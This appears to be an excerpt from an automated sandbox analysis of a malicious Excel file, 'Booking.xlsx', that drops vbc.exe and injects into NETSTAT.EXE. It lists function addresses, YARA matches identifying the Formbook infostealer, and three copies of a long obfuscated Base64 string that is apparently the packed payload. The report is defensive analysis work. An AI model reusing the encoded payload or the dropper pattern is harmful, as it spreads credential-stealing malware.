Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0226579A 8_2_0226579A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_022157C3 8_2_022157C3
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0221D47D 8_2_0221D47D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021F1489 8_2_021F1489
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02215485 8_2_02215485
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021E351F 8_2_021E351F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02226540 8_2_02226540
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021FC5F0 8_2_021FC5F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02293A83 8_2_02293A83
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02207B00 8_2_02207B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0228CBA4 8_2_0228CBA4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021DFBD7 8_2_021DFBD7
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0226DBDA 8_2_0226DBDA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021EC85C 8_2_021EC85C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0220286D 8_2_0220286D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0227F8EE 8_2_0227F8EE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02265955 8_2_02265955
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0228098E 8_2_0228098E
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021E29B2 8_2_021E29B2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021F69FE 8_2_021F69FE
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02212E2F 8_2_02212E2F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021FEE4C 8_2_021FEE4C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021F0F3F 8_2_021F0F3F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0220DF7C 8_2_0220DF7C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_02210D3B 8_2_02210D3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_021ECD5B 8_2_021ECD5B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_0227FDDD 8_2_0227FDDD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000DE212 8_2_000DE212
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000DD306 8_2_000DD306
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000DE5BA 8_2_000DE5BA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000C2D90 8_2_000C2D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000C9E3B 8_2_000C9E3B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000C9E40 8_2_000C9E40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000DCFA6 8_2_000DCFA6
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 8_2_000C2FB0 8_2_000C2FB0
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Booking.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 021DE2A8 appears 38 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 021DDF5C appears 113 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0222373B appears 238 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 02223F92 appears 108 times
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: String function: 0224F970 appears 81 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0095E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0095DF5C appears 119 times
Source: C:\Users\Public\vbc.exe Code function: String function: 009CF970 appears 81 times
Source: C:\Users\Public\vbc.exe Code function: String function: 009A3F92 appears 132 times
Source: C:\Users\Public\vbc.exe Code function: String function: 009A373B appears 238 times
Yara signature match
Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2216127314.0000000000240000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2218086639.0000000000590000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2181972415.0000000003309000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2380061864.0000000000480000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2216903843.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2380005232.0000000000360000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2379844728.00000000000C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.3453630.4.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.34a8450.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: svchost[1].2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: svchost[1].2.dr, frmRazor.cs Base64 encoded string: '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
Source: 4.2.vbc.exe.cf0000.2.unpack, frmRazor.cs Base64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
Source: 4.0.vbc.exe.cf0000.0.unpack, frmRazor.cs Base64 encoded string: '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
